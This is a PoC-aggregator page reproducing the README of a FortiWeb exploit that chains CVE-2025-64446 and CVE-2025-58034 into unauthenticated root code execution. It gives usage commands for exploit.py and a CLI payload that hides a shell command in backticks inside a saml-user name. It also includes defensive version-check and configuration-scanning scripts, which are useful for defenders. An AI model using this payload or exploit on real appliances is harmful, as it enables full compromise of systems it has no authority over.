Related vulnerability
Title: Fortinet FortiWeb security vulnerability (CVE-2025-64446). Description: Fortinet FortiWeb is a web application firewall from Fortinet (USA). It blocks attacks such as cross-site scripting, SQL injection, cookie poisoning and schema poisoning in order to secure web applications and protect sensitive database contents. FortiWeb 8.0.0 through 8.0.1, 7.6.0 through 7.6.4, 7.4.0 through 7.4.9, 7.2.0 through 7.2.11 and 7.0.0 through 7.0.11 contain a security vulnerability that stems from a relative path traversal and may allow execution of administrative commands.
Description
FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
Introduction
# FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
## Description
This script chains two critical vulnerabilities in Fortinet FortiWeb to achieve **unauthenticated remote code execution** with root privileges:
1. **CVE-2025-64446** – Authentication Bypass via Relative Path Traversal
Allows an unauthenticated attacker to bypass authentication and create a new administrative account.
2. **CVE-2025-58034** – Authenticated OS Command Injection
An authenticated attacker (using the account created in step 1) can execute arbitrary OS commands as root via crafted HTTP requests.
By combining these two vulnerabilities, an attacker can go from zero access to full system compromise without any prior credentials.
**Final Impact:** Unauthenticated Remote Code Execution (root shell equivalent)
## Vulnerability Details
### CVE-2025-64446 – Authentication Bypass (Relative Path Traversal)
* **Type:** Relative Path Traversal leading to Authentication Bypass
* **Severity:** Critical (CVSS 3.1 Base Score: 9.8)
* **CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **Affected Versions:**
* FortiWeb 8.0.0 – 8.0.1
* FortiWeb 7.6.0 – 7.6.4
* FortiWeb 7.4.0 – 7.4.9
* FortiWeb 7.2.0 – 7.2.11
* FortiWeb 7.0.0 – 7.0.11
### CVE-2025-58034 – Authenticated OS Command Injection
* **CVE:** CVE-2025-58034
* **Type:** Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) – [CWE-78]
* **Severity:** Critical
* **Description:**
An authenticated attacker can execute arbitrary operating system commands on the underlying system via specially crafted HTTP requests or CLI commands.
* **Affected Versions** (a wider range than CVE-2025-64446: 7.6.5 and 7.4.10 are affected by this CVE but not by the authentication bypass):
* FortiWeb 8.0.0 – 8.0.1
* FortiWeb 7.6.0 – 7.6.5
* FortiWeb 7.4.0 – 7.4.10
* FortiWeb 7.2.0 – 7.2.11
* FortiWeb 7.0.0 – 7.0.11
**Combined Attack Chain:**
1. Use CVE-2025-64446 → Create admin account (unauthenticated)
2. Log in with newly created admin account
3. Use CVE-2025-58034 → Execute arbitrary OS commands as root
The chain is only unauthenticated where the target is inside the CVE-2025-64446 range. On 7.6.5 and 7.4.10, which are affected by CVE-2025-58034 alone, step 1 does not apply and step 3 requires valid administrative credentials obtained some other way.
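The two version lists above differ at the top of the 7.6 and 7.4 branches, which decides whether a given appliance is exposed to the full unauthenticated chain or only to the authenticated command injection. The following script is an added example for this page, not code from the lincemorado97 repository: it checks a FortiWeb version string against exactly the ranges listed above and reports which CVEs apply. The version-string parsing and the notion of "chain possible" are this example's own assumptions.

```python
"""Check a FortiWeb version string against the affected ranges listed above.

Added example for this page, not part of the exploit repository. The inclusive
ranges below are copied from the two CVE entries on this page; everything else
(accepted version-string formats, the chain classification) is an assumption
of this example.
"""
from __future__ import annotations

import re

# (inclusive low, inclusive high) per CVE, as listed on this page
AFFECTED = {
    "CVE-2025-64446": [
        ("8.0.0", "8.0.1"),
        ("7.6.0", "7.6.4"),
        ("7.4.0", "7.4.9"),
        ("7.2.0", "7.2.11"),
        ("7.0.0", "7.0.11"),
    ],
    "CVE-2025-58034": [
        ("8.0.0", "8.0.1"),
        ("7.6.0", "7.6.5"),
        ("7.4.0", "7.4.10"),
        ("7.2.0", "7.2.11"),
        ("7.0.0", "7.0.11"),
    ],
}


def parse_version(text: str) -> tuple[int, int, int]:
    """Turn '7.6.4', 'v7.6.4' or 'FortiWeb 7.6.4' into the tuple (7, 6, 4)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def affected_cves(version: str) -> list[str]:
    """Return the CVEs from this page whose listed ranges include `version`."""
    v = parse_version(version)
    hits = []
    for cve, ranges in AFFECTED.items():
        if any(parse_version(lo) <= v <= parse_version(hi) for lo, hi in ranges):
            hits.append(cve)
    return hits


def chain_status(version: str) -> str:
    """Classify exposure: both CVEs -> unauthenticated chain; 58034 alone ->
    command injection that still needs admin credentials; neither -> not listed."""
    hits = set(affected_cves(version))
    if {"CVE-2025-64446", "CVE-2025-58034"} <= hits:
        return "unauthenticated RCE chain possible"
    if "CVE-2025-58034" in hits:
        return "command injection only (needs valid admin credentials)"
    return "not in any listed affected range"


if __name__ == "__main__":
    # Sample inputs constructed for the example; no appliance is contacted.
    for sample in ["7.6.4", "7.6.5", "7.6.6", "7.4.10", "8.0.2", "FortiWeb v7.2.11"]:
        print(f"{sample:18} {affected_cves(sample)!s:40} {chain_status(sample)}")
```

Feed it the version string reported by the appliance (the page does not specify where to read it; `get system status` on the CLI is the usual place on Fortinet devices). A result of "command injection only" means the appliance is outside the CVE-2025-64446 range and step 1 of the chain will not work against it.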
## Usage
1. **Clone the repository:**
```bash
git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
cd CVE-2025-64446_CVE-2025-58034
```
2. **Install dependencies:**
```bash
pip install -r requirements.txt
```
3. **Run the full exploit (creates admin + executes command):**
```bash
python exploit.py <target_ip> [-u <username>] [-p <password>]
```
* `<target_ip>`: The IP address or hostname of the vulnerable FortiWeb appliance. This is a *required* argument.
* `-u <username>` (optional): Specify a custom username for the created administrative account. If not provided, a UUID will be used.
* `-p <password>` (optional): Specify a custom password for the created administrative account. If not provided, the username will be used as the password.
**Example:**
```bash
python exploit.py 192.168.1.100 -u admin123 -p password456
```
This will attempt to create an administrative account with the username "admin123" and password "password456" on the target appliance at 192.168.1.100.
If no username and password are specified:
```bash
python exploit.py 192.168.1.100
```
The script will generate a random UUID for the username and use it as the password.
## Demonstration
### Step 1: Authentication Bypass & Admin Creation (CVE-2025-64446)


### Step 2: Remote Code Execution as root (CVE-2025-58034)
After logging in with the newly created administrative account, an attacker can exploit the authenticated command injection either through crafted HTTP requests or directly from the FortiWeb CLI.
One reliable method is the following CLI sequence (run from the FortiWeb command-line interface after authentication). The object name of the `saml-user` entry is wrapped in backticks, so the command placed inside them is substituted and executed when FortiWeb processes the entry; the remaining `set` lines only satisfy the object's required fields:
```bash
config user saml-user
edit "`<YOUR COMMAND>`"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end
```
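A defender reviewing a compromised or suspect appliance would want to know whether an entry of that shape exists in the configuration. The script below is an added example for this page, not part of the exploit repository. It scans configuration text for `config user saml-user` entries whose object name contains shell metacharacters, the pattern of the payload above. It assumes (the page does not confirm this) that a FortiWeb configuration backup uses the same `config ... / edit "name" / next / end` syntax as the CLI block; the sample configuration embedded in it is constructed for the example.

```python
"""Flag FortiWeb saml-user object names that carry shell metacharacters.

Added example for this page, not part of the exploit repository. Assumes the
configuration backup mirrors the CLI syntax shown above (not confirmed by the
page). SAMPLE_CONFIG is constructed for this example.
"""
import re

SAMPLE_CONFIG = '''\
config user saml-user
    edit "corp-idp"
        set entityID https://idp.example.com/metadata
        set service-path /saml
    next
    edit "`id > /tmp/x`"
        set entityID http://foo
        set service-path /foo
    next
    edit "foo$(id)"
        set entityID http://foo
    next
end
config system admin
    edit "c9b2d6f0-1111-2222-3333-444455556666"
        set accprofile prof_admin
    next
end
'''

# characters that let a quoted object name reach a shell as code
METACHARS = re.compile(r"[`$;|&<>]")

# an `edit "..."` line; the group is the name between the quotes
_EDIT = re.compile(r'^\s*edit\s+"((?:[^"\\]|\\.)*)"\s*$')


def suspicious_saml_users(config_text: str) -> list[tuple[int, str]]:
    """Return (line_number, name) for saml-user names containing metacharacters.

    Only entries inside 'config user saml-user' are examined. Other tables are
    skipped on purpose: the UUID-style admin names the exploit creates under
    'config system admin' are a different indicator and contain no metacharacters.
    """
    hits = []
    in_saml = False
    for lineno, line in enumerate(config_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped == "config user saml-user":
            in_saml = True
            continue
        if stripped == "end":
            in_saml = False
            continue
        if not in_saml:
            continue
        m = _EDIT.match(line)
        if m and METACHARS.search(m.group(1)):
            hits.append((lineno, m.group(1)))
    return hits


if __name__ == "__main__":
    for lineno, name in suspicious_saml_users(SAMPLE_CONFIG):
        print(f"line {lineno}: suspicious saml-user name {name!r}")
```

Run it over an exported configuration; any hit is an entry that should not exist in a legitimately configured SAML user and points at the command-injection step having been used. Legitimate SAML user names have no reason to contain backticks, `$`, `;`, `|`, `&`, `<` or `>`.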


## Verification
After execution:
- Check the output for the command's results (e.g. `uid=0(root) gid=0(root)` from `id` confirms the command ran as root)
- Log in via SSH (if you added a key) or via the web interface with the created credentials
## References
* CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
* CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
* Fortinet PSIRT Advisories: https://www.fortinet.com/support/psirt
* Analysis: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis
**Disclaimer:** This tool is provided for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
File snapshot
[4.0K] /data/pocs/b9127dd4e7b55259be7ac172f4f45b65e37044f4
├── [4.6K] exploit.py
├── [4.0K] images
│ ├── [7.0K] exploit.png
│ ├── [ 70K] fortinet.png
│ ├── [ 23K] rce_demo.png
│ └── [ 18K] root_shell.png
├── [5.0K] README.md
└── [ 50] requirements.txt
2 directories, 7 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. Shenlong (神龙) has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.